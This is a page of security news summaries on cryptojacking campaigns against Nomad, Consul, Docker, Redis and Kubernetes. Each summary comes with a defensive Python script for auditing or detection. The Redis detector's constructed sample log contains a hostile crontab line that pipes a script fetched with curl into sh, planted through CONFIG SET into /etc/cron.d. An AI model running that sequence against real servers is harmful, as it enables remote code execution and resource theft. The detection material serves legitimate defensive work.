@Wiz Blog | RSS feed
A widespread cryptojacking campaign is targeting misconfigured DevOps infrastructure, including HashiCorp Nomad and Consul, the Docker Engine API, and Gitea, to mine Monero. The attackers, tracked by Wiz as JINX-0132, exploit known misconfigurations and vulnerabilities in publicly accessible web servers to deploy mining software. Wiz describes this as the first publicly documented case of Nomad misconfigurations being exploited as an attack vector in the wild.
JINX-0132 avoids the unique identifiers that normally let defenders cluster a campaign: instead of custom tooling, it downloads what it needs directly from public GitHub repositories, including unmodified release builds of XMRig. This "living-off-open-source" approach makes detection and attribution harder. The group abuses insecure configurations and vulnerable software versions to hijack DevOps web servers, and affected Nomad instances can manage hundreds of clients, so a single exposed server can hand over significant compute. Organizations are advised to review their configurations, enable Nomad's access control lists (ACLs), which are disabled by default so that anyone who can reach the API can submit jobs, and configure Consul's ACL system so that unauthenticated clients cannot read or change the cluster.
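The advice above boils down to one question per service: does the control-plane API answer an anonymous request? The following script is an added example written for this page, not Wiz's tooling or anything from HashiCorp, Docker or Gitea. It sends one unauthenticated GET to each service and classifies the answer. The ports, the endpoints chosen and the verdict rules (a 200 is open, a 401/403 is protected) are this example's assumptions about default installations; `classify` is separated from the network call so the decision logic can be checked offline.

```python
"""Added example: audit whether DevOps control-plane APIs answer anonymous requests.
Not Wiz's tooling; ports, endpoints and verdict rules are assumptions about default setups."""
import json
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Optional

# Assumed default listener ports: Nomad HTTP 4646, Consul HTTP 8500,
# Docker Engine API over plain TCP 2375, Gitea 3000.
PROBES = {
    "nomad":  (4646, "/v1/jobs"),             # job list; 403 "Permission denied" when ACLs are on
    "consul": (8500, "/v1/agent/self"),       # agent config; 403 under a default-deny ACL policy
    "docker": (2375, "/info"),                # engine info; the API has no authentication of its own
    "gitea":  (3000, "/api/v1/admin/users"),  # admin-only; 401/403 unless a token is supplied
}


@dataclass
class Finding:
    service: str
    status: Optional[int]
    verdict: str   # "OPEN", "PROTECTED", "UNREACHABLE" or "UNKNOWN"
    detail: str


def classify(service: str, status: Optional[int], body: str) -> Finding:
    """Turn one probe's HTTP status and body into a verdict.

    Only a 200 counts as open: Nomad with ACLs enabled answers 403 to a token-less
    /v1/jobs, Consul's default-deny policy does the same for /v1/agent/self, and Gitea
    rejects anonymous admin calls. Any other status is reported rather than guessed at.
    """
    if status is None:
        return Finding(service, None, "UNREACHABLE", body)
    if status in (401, 403):
        return Finding(service, status, "PROTECTED", "anonymous request rejected")
    if status != 200:
        return Finding(service, status, "UNKNOWN", f"unexpected status {status}")
    try:
        data = json.loads(body)
    except ValueError:
        return Finding(service, status, "OPEN", "200 with a non-JSON body (check manually)")
    if service == "nomad":
        # With ACLs disabled the same anonymous client that can list jobs can also submit them.
        detail = f"anonymous client can list {len(data)} job(s) and could submit its own"
    elif service == "docker":
        detail = f"anonymous client can drive the engine (ServerVersion {data.get('ServerVersion')})"
    elif service == "consul":
        detail = "anonymous client can read agent configuration; check acl.default_policy"
    else:
        detail = "anonymous client reached an admin endpoint"
    return Finding(service, status, "OPEN", detail)


def probe(host: str, service: str, timeout: float = 3.0) -> Finding:
    """Send one unauthenticated GET and classify the answer (needs network access)."""
    port, path = PROBES[service]
    url = f"http://{host}:{port}{path}"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return classify(service, resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        return classify(service, e.code, e.read().decode("utf-8", "replace"))
    except (urllib.error.URLError, OSError) as e:
        return classify(service, None, str(e))


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for svc in PROBES:
        f = probe(target, svc)
        print(f"{f.service:7} {f.verdict:11} {f.status} {f.detail}")
```

Run it against a host you own with `python3 audit.py 10.0.0.5`. An `OPEN` verdict for Nomad means the job API accepts anonymous submissions; a `PROTECTED` verdict only tells you that this one endpoint demands a token, so it complements rather than replaces a review of the ACL configuration itself.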
Aminu Abdullahi@eSecurity Planet
Cybersecurity researchers are raising alarms about a new, technically involved cryptojacking campaign called RedisRaider, which targets publicly accessible Redis servers running on Linux. Discovered by Datadog Security Labs, RedisRaider uses an aggressive attack chain to deploy Monero miners on compromised systems. The malware uses a custom-built scanner to find exposed Redis servers across the internet, then abuses servers that accept unauthenticated commands to plant cron jobs that download and run the primary payload.
The attackers behind RedisRaider have invested in evading detection and analysis. The malware is written in Go and obfuscated with Garble, which hides the names and structure of key functions. It also takes anti-forensic measures: the Redis keys it writes carry short time-to-live (TTL) values so they expire soon after use, the payload is dropped into cron directories where it sits among legitimate scheduled jobs, and keys and logs are deleted after execution. Together these make the activity harder to spot and to reconstruct after the fact.

Datadog's investigation also found that the infrastructure used for the server-level attacks hosted a web-based Monero miner, indicating a multi-pronged revenue strategy: the attackers earn not only from hijacked Linux servers but also from unsuspecting visitors of web pages that serve the miner. Experts emphasize proper configuration and security measures for publicly accessible Redis servers, including strong authentication and access controls, to prevent RedisRaider and similar campaigns from compromising systems and stealing resources.
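The cron-job technique above leaves a recognizable command sequence on the Redis side: the dump directory is redirected into a cron directory, the dump filename is changed, a key holding a crontab-looking value is written (here with a short TTL), and a SAVE or BGSAVE turns the dump into a crontab file. The script below is an added example for this page, not Datadog's detection logic or any code from RedisRaider; it reads `redis-cli MONITOR` output and raises an alert only when the full sequence is seen from one client. The sample MONITOR lines, the cron directory list and the 300-second "short TTL" threshold are constructed assumptions.

```python
"""Added example, not Datadog's detector: flag the Redis cron-persistence sequence in MONITOR output."""
import re
from collections import defaultdict

# Assumed: directories cron reads from; an RDB dump written here becomes a crontab file.
CRON_DIRS = ("/etc/cron.d", "/var/spool/cron", "/etc/cron.hourly", "/etc/cron.daily")
SHORT_TTL_SECONDS = 300   # assumed threshold for "key meant to vanish right after use"

# MONITOR line shape: <epoch> [<db> <client addr>] "CMD" "arg" ...  (quoted, backslash-escaped)
LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# five cron schedule fields followed by a command
CRONTAB_RE = re.compile(r'(?:[*\d/,-]+\s+){4}[*\d/,-]+\s+\S')

# Constructed sample: one hostile client (203.0.113.7) and one ordinary application client.
SAMPLE_MONITOR = """\
1716000001.000001 [0 203.0.113.7:40122] "INFO"
1716000001.100002 [0 203.0.113.7:40122] "CONFIG" "SET" "dir" "/etc/cron.d"
1716000001.200003 [0 203.0.113.7:40122] "CONFIG" "SET" "dbfilename" "zzh"
1716000001.300004 [0 203.0.113.7:40122] "SET" "x" "\\n\\n*/1 * * * * root curl -fsSL http://198.51.100.9/init.sh | sh\\n\\n" "EX" "60"
1716000001.400005 [0 203.0.113.7:40122] "SAVE"
1716000001.500006 [0 203.0.113.7:40122] "DEL" "x"
1716000002.000007 [0 10.0.0.12:51000] "GET" "session:abc"
1716000002.100008 [0 10.0.0.12:51000] "SET" "session:abc" "eyJ1aWQiOjQyfQ" "EX" "3600"
"""


def parse_monitor_line(line):
    """Split one MONITOR line into timestamp, client address and argument list."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m.group("ts")), "client": m.group("client"),
            "args": ARG_RE.findall(m.group("args"))}


def ttl_seconds(args):
    """TTL requested by SET ... EX <s> / PX <ms>, or None if the key has no expiry."""
    upper = [a.upper() for a in args]
    for flag, scale in (("EX", 1), ("PX", 1000)):
        if flag in upper[3:]:
            try:
                return int(args[upper.index(flag, 3) + 1]) / scale
            except (IndexError, ValueError):
                return None
    return None


def detect(monitor_text):
    """Return alerts for clients that redirect the RDB dump into a cron directory and save it.

    State is kept per client address: a single CONFIG SET or SET in isolation is not enough,
    the combination across the session is what makes the sequence suspicious.
    """
    alerts = []
    state = defaultdict(lambda: {"cron_dir": None, "dbfilename": None, "indicators": set()})
    for line in monitor_text.splitlines():
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        args, st = ev["args"], state[ev["client"]]
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key, val = args[2].lower(), args[3]
            if key == "dir" and val.rstrip("/").startswith(CRON_DIRS):
                st["cron_dir"] = val
                alerts.append({"ts": ev["ts"], "client": ev["client"], "severity": "medium",
                               "reason": f"dump directory moved to {val}", "indicators": []})
            elif key == "dbfilename":
                st["dbfilename"] = val
        elif cmd == "SET" and len(args) >= 3:
            if CRONTAB_RE.search(args[2]):
                st["indicators"].add("crontab-like value")
            ttl = ttl_seconds(args)
            if ttl is not None and ttl <= SHORT_TTL_SECONDS:
                st["indicators"].add(f"short ttl {ttl:g}s")
        elif cmd in ("SAVE", "BGSAVE") and st["cron_dir"]:
            alerts.append({"ts": ev["ts"], "client": ev["client"], "severity": "high",
                           "reason": f"RDB dump written to {st['cron_dir']}/{st['dbfilename'] or 'dump.rdb'}",
                           "indicators": sorted(st["indicators"])})
    return alerts


if __name__ == "__main__":
    import sys
    text = SAMPLE_MONITOR if sys.stdin.isatty() else sys.stdin.read()
    for alert in detect(text):
        print(alert)
```

Feed it live with `redis-cli MONITOR | python3 redis_cron_detect.py`, bearing in mind that MONITOR itself costs throughput on a busy instance. Detection is the fallback; the fix the report calls for is to require authentication and restrict who can reach the port, and removing the anonymous client's ability to run CONFIG closes this particular sequence at its first step.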
@www.microsoft.com
Microsoft Threat Intelligence is reporting a significant rise in cyberattacks targeting unsecured Kubernetes clusters. These attacks are primarily aimed at illicit cryptocurrency mining, with threat actors exploiting weaknesses such as unsecured workload identities and inactive accounts to gain unauthorized access to containerized environments. Microsoft's data indicates that 51% of workload identities remained inactive over the past year, each one a potential entry point that nobody is watching. The growing adoption of containers-as-a-service has expanded the attack surface and made it more attractive to criminals seeking to profit from stolen computing resources.
The dynamic nature of Kubernetes environments poses significant challenges for security teams: the rapid deployment and scaling of containers make it difficult to detect runtime anomalies and to trace the origin of a breach. Attackers exploit misconfigured resources, outdated container images, inadequate network segmentation, and overly permissive access controls to get in. Observed attack vectors include compromised cloud credentials, malicious container images, abuse of the Kubernetes API, node-level attacks and pod escapes, and injection of unauthorized network traffic. In one recent case, the AzureChecker.exe tool was used to run password spray attacks against cloud tenants, and the resulting access was used to create cryptomining containers inside compromised resource groups.

To help defenders keep up, Microsoft has been working with MITRE to update the Kubernetes threat matrix and the ATT&CK for Containers matrix, giving organizations a structured framework for assessing and reducing the attack surface of containerized environments. The recommended practices include immutable container policies, strong authentication, rigorous vulnerability management, admission controllers, image assurance policies, and continuous monitoring of API activity. Separately, a Docker malware campaign has been found abusing Teneo Web3 nodes by faking heartbeat signals to earn cryptocurrency, another illustration of the range of ways attackers monetize compromised container environments.
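Two of the recommendations above, image assurance and monitoring of API activity, can be exercised directly against API-server audit logs, and the same logs expose the inactive workload identities the report counts. The Python below is an added example written for this page, not code from Microsoft or MITRE. It parses `audit.k8s.io/v1` events in JSON-lines form, flags pod creations that use an image outside an allowlisted registry, run privileged, or share host namespaces, and lists service accounts that have not appeared within an idle window. The sample events, the allowlisted registry `registry.internal.example`, the service-account inventory and the 90-day threshold are all constructed assumptions.

```python
"""Added example (not Microsoft's or MITRE's code): review Kubernetes audit events for
pods that violate an image-assurance policy and for workload identities that are never seen.
Registry allowlist, sample events, account inventory and idle threshold are assumptions."""
import json
from datetime import datetime, timedelta, timezone

ALLOWED_REGISTRIES = ("registry.internal.example",)   # assumed: the only trusted registry
MAX_IDLE_DAYS = 90                                     # assumed idle window

# Constructed audit.k8s.io/v1 events, not real cluster data.
SAMPLE_AUDIT = "\n".join(json.dumps(e) for e in [
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
     "requestReceivedTimestamp": "2025-05-20T10:00:00.000000Z", "verb": "create",
     "user": {"username": "system:serviceaccount:ci:builder"},
     "objectRef": {"resource": "pods", "namespace": "ci", "name": "build-1"},
     "requestObject": {"spec": {"containers": [
         {"name": "b", "image": "registry.internal.example/ci/builder:1.4"}]}},
     "responseStatus": {"code": 201}},
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
     "requestReceivedTimestamp": "2025-05-20T10:05:00.000000Z", "verb": "create",
     "user": {"username": "alice@corp.example"},
     "objectRef": {"resource": "pods", "namespace": "default", "name": "xm-9"},
     "requestObject": {"spec": {"hostPID": True, "containers": [
         {"name": "w", "image": "alpine:3.19", "securityContext": {"privileged": True}}]}},
     "responseStatus": {"code": 201}},
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
     "requestReceivedTimestamp": "2025-01-01T00:00:00.000000Z", "verb": "list",
     "user": {"username": "system:serviceaccount:monitoring:prom"},
     "objectRef": {"resource": "pods"}, "responseStatus": {"code": 200}},
])
KNOWN_SERVICE_ACCOUNTS = [   # assumed inventory, e.g. from `kubectl get sa -A`
    "system:serviceaccount:ci:builder",
    "system:serviceaccount:monitoring:prom",
    "system:serviceaccount:default:legacy-deployer",
]
SAMPLE_NOW = "2025-05-21T00:00:00.000000Z"


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def image_registry(image):
    """Registry part of an image reference, following the rule container runtimes use:
    the first path component is a registry only if it contains '.' or ':' or is 'localhost';
    otherwise the image is implicitly pulled from docker.io."""
    first, sep, _ = image.partition("/")
    if sep and ("." in first or ":" in first or first == "localhost"):
        return first
    return "docker.io"


def pod_policy_findings(events, allowed_registries=ALLOWED_REGISTRIES):
    """Image-assurance and privilege checks on every pod creation in the log."""
    findings = []
    for ev in events:
        ref = ev.get("objectRef", {})
        if ev.get("verb") != "create" or ref.get("resource") != "pods":
            continue
        spec = ev.get("requestObject", {}).get("spec", {})
        violations = []
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            if image_registry(c.get("image", "")) not in allowed_registries:
                violations.append(f"image {c.get('image')} not from an allowed registry")
            if c.get("securityContext", {}).get("privileged"):
                violations.append(f"container {c.get('name')} is privileged")
        for flag in ("hostPID", "hostNetwork"):
            if spec.get(flag):
                violations.append(f"{flag} enabled")
        if violations:
            findings.append({"pod": f"{ref.get('namespace')}/{ref.get('name')}",
                             "user": ev.get("user", {}).get("username"),
                             "violations": violations})
    return findings


def inactive_service_accounts(events, known_accounts, now_ts, max_idle_days=MAX_IDLE_DAYS):
    """Known service accounts with no API activity inside the idle window.
    Caveat: the audit log only covers its retention period, so treat this as a shortlist
    to review, not proof that an account is unused."""
    now, last_seen = parse_ts(now_ts), {}
    for ev in events:
        user = ev.get("user", {}).get("username", "")
        if user.startswith("system:serviceaccount:"):
            ts = parse_ts(ev["requestReceivedTimestamp"])
            if user not in last_seen or ts > last_seen[user]:
                last_seen[user] = ts
    idle = timedelta(days=max_idle_days)
    return sorted(sa for sa in known_accounts
                  if sa not in last_seen or now - last_seen[sa] > idle)


def run_sample():
    events = parse_events(SAMPLE_AUDIT)
    return (pod_policy_findings(events),
            inactive_service_accounts(events, KNOWN_SERVICE_ACCOUNTS, SAMPLE_NOW))


if __name__ == "__main__":
    findings, inactive = run_sample()
    for f in findings:
        print(f"{f['pod']} by {f['user']}: " + "; ".join(f["violations"]))
    print("inactive service accounts:", inactive)
```

The `image_registry` rule matters more than it looks: a pod spec that says `alpine:3.19` pulls from docker.io, so an allowlist that only compares string prefixes would wave it through. The same checks are what an admission controller should enforce before the pod is created; running them over the audit log afterwards is the monitoring step that catches what got past admission or was created before the policy existed.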